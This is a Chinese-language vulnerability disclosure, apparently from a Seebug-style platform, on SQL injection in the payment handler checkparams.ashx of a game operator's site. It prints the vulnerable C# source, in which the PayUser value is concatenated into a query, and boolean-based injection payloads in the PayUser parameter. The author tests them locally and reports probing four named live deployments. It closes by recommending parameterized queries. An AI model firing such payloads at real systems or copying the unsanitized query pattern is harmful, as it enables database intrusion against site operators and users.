### 简要描述: 通用性注入 ### 详细说明: 漏洞页面地址 ``` api/payment/checkparams.ashx ``` 源码如下 ``` <%@ WebHandler Language="C#" Class="com.xykj.pay.checkparams" %> using System.Web; using System.Text; using System.Collections.Generic; using System.Linq; using System.Globalization; namespace com.xykj.pay { /// <summary> /// 检查用户信息 /// </summary> public class checkparams : IHttpHandler { public void ProcessRequest(HttpContext context) { var param = context.Request.Params; var r = context.Response; var gid = param["GameId"];//游戏ID var sid = param["ServerId"];//服务器ID //r.Write("200"); //return; try { /*** 判断能否使用该充值方式 *******/ var NotAllow = new string[] { "gpay_epay_pay", "gpay_alipay_pay", "gpay_huanpay_pay", "gpay_shengpay_pay","gpay_eaypay_pay","gpay_huipay_pay", "gpay_xiuxian_pay","gpay_zhigame_pay","gpay_g265_pay","gpay_yeyou35_pay", "gpay_boof_pay"}; var payawy = param["PayAwy"].ToLower(); if (payawy.StartsWith("ty")) payawy = payawy.Substring(2); var payallow = ""; if (payawy.StartsWith("yee")) payallow = "gpay_epay_pay"; else if (payawy.StartsWith("pt0")) payallow = "gpay_shengpay_pay"; else if (payawy.StartsWith("epay")) payallow = "gpay_eaypay_pay"; else if (payawy.StartsWith("hf")) payallow = "gpay_huipay_pay"; else if (payawy.StartsWith("1073")) payallow = "gpay_xiuxian_pay"; else if (payawy.StartsWith("zhigame")) payallow = "gpay_zhigame_pay"; else if (payawy.StartsWith("alipay")) payallow = "gpay_alipay_pay"; else if (payawy.StartsWith("hx")) payallow = "gpay_huanpay_pay"; else if (payawy.StartsWith("g265")) payallow = "gpay_g265_pay"; else if (payawy.StartsWith("yeyou35")) payallow = "gpay_yeyou35_pay"; else if (payawy.StartsWith("boopay")) payallow = "gpay_boof_pay"; business.View.Games.Port _port = new business.View.Games.Port(); var obj = _port.GetPayType(gid); if (obj.Contains(payallow)) { r.Write(string.Format("游戏:{0},不能使用该充值方式,请选择其他充值方式!", param["GameName"])); return; } /**********/ /*** 参数检查 *********/ var useraccount = param["PayUser"]; //没处理 var user = new 
com.xykj.business.View.Account.Account().GetUserByAccount(useraccount); //跟进 if (user == null) { r.Write("用户不存在,请检查账户是否填写正确"); return; } if (user.State == (int)com.xykj.common.Enums.UserState.Delete) { r.Write("该用户被删除,已经不能登录,禁止充值"); return; } if (user.State == (int)com.xykj.common.Enums.UserState.Lock) { r.Write("该用户被锁定,暂时不能登录,禁止充值"); return; } if (user.State == (int)com.xykj.common.Enums.UserState.Loss) { r.Write("该用户已挂失,禁止充值"); return; } if (param["PayTo"] == "game") { var _game = new business.View.Games.Game(); var game = _game.GetGame(XY.ToInt(gid)); if (game.Count > 0) { if (!game[0].OnPay) { r.Write("该游戏被管理员设置为禁止充值状态"); return; } } else { r.Write("游戏编号错误,请选择游戏"); return; } var _server = new business.View.Games.Server(); var server = _server.GetServer(XY.ToInt(sid)); if (server == null) { r.Write("服务器编号错误,请重新选择服务器"); return; } if (server.OnPay == false) { r.Write("该游戏服被管理员设置为禁止充值状态"); return; } /*#*#*#*#**#*#*#*#*#**#*#*#*#*#**#*#*#*#*#**#*/ /*** 检查用户是否在游戏中创建角色 ***********/ var port = _port.GetPortByGameId(server.GameId); if (port == null) { r.Write("服务器未搭建完全,请稍后进行充值!"); return; } com.xykj.games.UserEngine _ge = new games.UserEngine(); var rest = _ge.PayGame(user, game[0], server, port, null); if (rest != "-255") { r.Write("您未在该服务器建立角色,请确认充值服务器!"); return; } /*#*#*#*#**#*#*#*#*#**#*#*#*#*#**#*#*#*#*#**#*/ } /************************************/ if (param["PayTo"] == "station") { if (param["PayAwy"] == "tystationpay") { r.Write("不能用 " + app.Setting("sys_station_moneyname") + " 充值 " + app.Setting("sys_station_moneyname")); return; } if (param["PayAwy"].StartsWith("ty1073")) { r.Write("休闲游戏充值方式,只能用作游戏充值!"); return; } } if ("tystationpay" == param["PayAwy"]) { var currency = new com.xykj.business.Currency().GetMoney(user.ID); if (currency == null || currency.CanCurrency < decimal.Parse(param["PayMoney"])) { r.Write(app.Setting("sys_station_moneyname") + "数量不足,请先充值" + app.Setting("sys_station_moneyname") + "!"); return; } var bseMoney = 
decimal.Parse(param["GetMoney"]); if (bseMoney < decimal.Parse("1.000")) { r.Write("可获金币少于 1 元,不能充值!"); return; } } var pay_setting_money = app.Setting("pay_setting_money").Split(new string[] { "\r\n", "\r", "\n" }, System.StringSplitOptions.RemoveEmptyEntries); var mns = new Dictionary<int, string>(); foreach (var item in pay_setting_money) { if (item.Length < 2) continue; var moneys = item.Split(new char[] { ':' }); mns.Add(XY.ToInt(moneys[0]), moneys[1]); } var pay_money = param["PayMoney"]; if (!mns.ContainsKey(XY.ToInt(pay_money)))//兑换的游戏币 { r.Write("充值金额错误,请选择正确的金额"); return; } r.Write("200"); } catch (System.Exception er) { context.Response.Write("系统<br/>" + er.Message); } } public bool IsReusable { get { return false; } } } } ``` ``` public xy_users GetUserByAccount(string account) { XY.Cache.Delete(XY.MD5("select * from xy_users where Account='" + account + "'")); return this._user.GetUserByAccount(account); //没处理存在注入了 } ``` ### 漏洞证明: 漏洞证明 先本地验证吧 ``` http://192.168.1.108/api/payment/checkparams.ashx ``` 提交 ``` PayAwy=yee&gid=1&ServerId=2&PayUser=admin1 ``` 正常显示 [<img src="https://images.seebug.org/upload/201405/31120812406a10269762ca1d531bb01c96ea1032.png" alt="531.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/31120812406a10269762ca1d531bb01c96ea1032.png) 提交 ``` PayAwy=yee&gid=1&ServerId=2&PayUser=admin1' and 1=1 -- ``` 正常显示 [<img src="https://images.seebug.org/upload/201405/311209419e1d39eff13914898a9a42cbd71a0427.png" alt="53112.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/311209419e1d39eff13914898a9a42cbd71a0427.png) 提交 ``` PayAwy=yee&gid=1&ServerId=2&PayUser=admin1' and 1=2 -- ``` [<img src="https://images.seebug.org/upload/201405/311210213be054d5018312119f82770b0ad335ba.png" alt="5313.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/311210213be054d5018312119f82770b0ad335ba.png) 提交 ``` 
PayAwy=yee&gid=1&ServerId=2&PayUser=admin1' and (select @@version)>0-- ``` [<img src="https://images.seebug.org/upload/201405/31121228304847123ef13c46555fb54106e60b71.png" alt="5314.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/31121228304847123ef13c46555fb54106e60b71.png) 下面测试官网的几套部署。由于有安全狗，这里只证明存在注入点，不做进一步验证。 第一套 ``` http://xy001.52xinyou.cn/ ``` [<img src="https://images.seebug.org/upload/201405/3112155687465cbca077ef71a230d7fc0663d9ca.png" alt="5315.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/3112155687465cbca077ef71a230d7fc0663d9ca.png) [<img src="https://images.seebug.org/upload/201405/31121619d61b01b8b0a35136e4160513c3f79ded.png" alt="5316.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/31121619d61b01b8b0a35136e4160513c3f79ded.png) [<img src="https://images.seebug.org/upload/201405/3112163787556bf84ef55ba2fb908f5ee145bbd6.png" alt="5317.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/3112163787556bf84ef55ba2fb908f5ee145bbd6.png) 第二套 ``` http://xy002.52xinyou.cn/ ``` [<img src="https://images.seebug.org/upload/201405/311218449f54c8059d6e9f4da008392cbfcfe279.png" alt="5321.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/311218449f54c8059d6e9f4da008392cbfcfe279.png) [<img src="https://images.seebug.org/upload/201405/311218564669fab5f55049b0764da1c02422c22f.png" alt="5322.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/311218564669fab5f55049b0764da1c02422c22f.png) [<img src="https://images.seebug.org/upload/201405/31121912101c6b9f5be274ac28e24b197f4dc0c8.png" alt="5323.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/31121912101c6b9f5be274ac28e24b197f4dc0c8.png) 第三套 ``` http://xy003.52xinyou.cn ``` [<img 
src="https://images.seebug.org/upload/201405/311221265f4b23ffc44280e5ced279e972b9c857.png" alt="5324.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/311221265f4b23ffc44280e5ced279e972b9c857.png) [<img src="https://images.seebug.org/upload/201405/31122145e60ad964590177e19429173b60ceb587.png" alt="5325.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/31122145e60ad964590177e19429173b60ceb587.png) [<img src="https://images.seebug.org/upload/201405/3112220218e4e8904f0f90063b657e94363c1922.png" alt="5326.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/3112220218e4e8904f0f90063b657e94363c1922.png) 第四套 ``` http://xy006.52xinyou.cn ``` [<img src="https://images.seebug.org/upload/201405/31122531a06b3e8776ca9830146f0b1da3865de4.png" alt="5327.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/31122531a06b3e8776ca9830146f0b1da3865de4.png) [<img src="https://images.seebug.org/upload/201405/311225424ab4b93fc903423aaaaef3dee856a414.png" alt="5328.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/311225424ab4b93fc903423aaaaef3dee856a414.png) [<img src="https://images.seebug.org/upload/201405/311225579d707bf640efc11ffe6c1362d56b4996.png" alt="5329.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/311225579d707bf640efc11ffe6c1362d56b4996.png) 以上可以证明存在注入；由于有安全狗，不便进一步验证，但漏洞确实存在。从 `GetUserByAccount` 中用于生成缓存键的 SQL 字符串可以看出，`PayUser` 传入的 account 是直接拼接进查询的，未经任何处理；根本的修复是改为参数化查询，而不是依赖 WAF 拦截。